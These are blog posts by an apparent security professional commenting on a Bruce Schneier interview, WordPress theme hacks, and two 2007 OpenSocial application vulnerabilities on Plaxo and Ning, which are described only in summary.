Luminary Economics?

 There is a  good interview with Bruce Schneier over at the Freakonomics blog. I am just getting through it, but here are a couple of Q&A excerpts that I tend to get a lot and completely agree with the answer given:

“Q: So seriously, do you shop on Amazon, or anywhere else online for that matter?     

 A: Of course. I shop online all the time; it’s far easier than going to a store, or even calling a mail-order phone number, if I know exactly what I want.What you’re really asking me is about the security. No one steals credit card numbers one-by-one, by eavesdropping on the Internet connection. They’re all stolen in blocks of a million by hacking the back-end database. It doesn’t matter if you bought something over the Internet, by phone, by mail, or in person — you’re equally vulnerable.” 

I cannot stress this enough! It doesn’t matter whether your purchases are online or offline, in reality they’re all online. All of our transactions go through computer systems, are stored in large databases and are transmitted over networks. Look at the large security breaches in the news, many of them are ‘offline’ purchases. 

“Q: What was the one defining moment in your life that you knew you wanted to dedicate your life to computer security and cryptography?          

A: I don’t know. Security is primarily a way of looking at the world, and I’ve always looked at the world that way. As a child, I always noticed security systems — in retail stores, in banks, in office buildings — and how to defeat them. I remember accompanying my mother to the voting booth, and noticing ways to break the security. So it’s less of a defining moment and more of a slow process.”

 Security is a way of thinking. When interviewing candidates for information security roles, one of the things I look for beyond learned skills is how they think about problems. Specifically, a ‘security person’ thinks of different ways to break things. They think of ways to deconstruct the system and make it perform actions it was never intended to perform.

  

WordPress Hacking

There’s been some interesting posts around the net over the past week about WordPress blogs being hacked. The source vulnerabilities appear to be embedded within various WordPress themes created by outside developers.

 There’s a pretty decent write-up on GigaOm. It’s good to see this kind of attention outside of the usual security crowds.  Note: This blog runs on WordPress. Serves as a friendly reminder to review and understand the source code running on your site or application.

 Update: It looks like some more blog hacking just made the news. Al Gore’s blog has been hacked. Les Orchard (friend and former colleague of mine) appears to have has the same issue over at Decafbad. 

The OpenSocial Hacks

So Google made a lot of news recently with their announcement of the OpenSocial API. The goal is to create a single set of APIs for application developers allowing them to build applications across multiple social networks such as Ning, LinkedIn, MySpace, Plaxo, etc. Tapping into the huge user base of these social networks with a single API should bring the time between application launch and having a significant user base down dramatically.

Since launching the API just a few days ago, there have already been 2 very public hacks of applications using it. The first hack was an application that launched on the Plaxo network and was hacked within 45 minutes. The hack was by no means malicious and committed by a self proclaimed amateur, TheHarmonyGuy. Here are the relevant stats from his blog:

Date: Friday, November 2, 2007

Initial hack: 45 minutes

Vulnerabilities:

• Able to change current Emote status for any user
• Able to access Emote history and current status for any user
• Able to insert HTML, including JavaScript, into Emote pages

Coverage: TechCrunch

Progress: Plaxo has removed Emote from their whitelist. As of Nov. 6, Emote remains unpatched.

He has just followed this up with another innocuous hack of a new application using the API on the Ning platform. TheHarmonyGuy was able to access the friends of Ning founder Marc Andreessen through the iLike application. And of course, the posted stats of the hack:

Date: November 5, 2007

Initial hack: 20 minutes

Vulnerabilities:

• Able to access listing of friends for any user and limited personal information about these friends
• Able to add and remove playlist tracks for any user

Coverage: TechCrunch

Progress: Ning and iLike have both been notified. Ning has replied and stated they are working to fix the issues ASAP.

Update: Confirmed that the first vulnerability is a Ning issue, not an iLike issue. More details here.

It’s great to see the coverage and attention these hacks are getting from the non-security crowd. As you can see from the stats TechCrunch has been giving TheHarmonyGuy a lot of attention. It reminds me a bit of the Adrian Lamo hacking events (here and here) of a few years ago. I am hoping the lessons learned from these public displays have a longer lasting affect than Adrian Lamo had. It seems clear there was a big rush to get some of this code out (although, it turns out, the second hack is more of an issue with Ning than OpenSocial) and some basic application security steps may have been skipped. Obviously this is not the first or last time for this.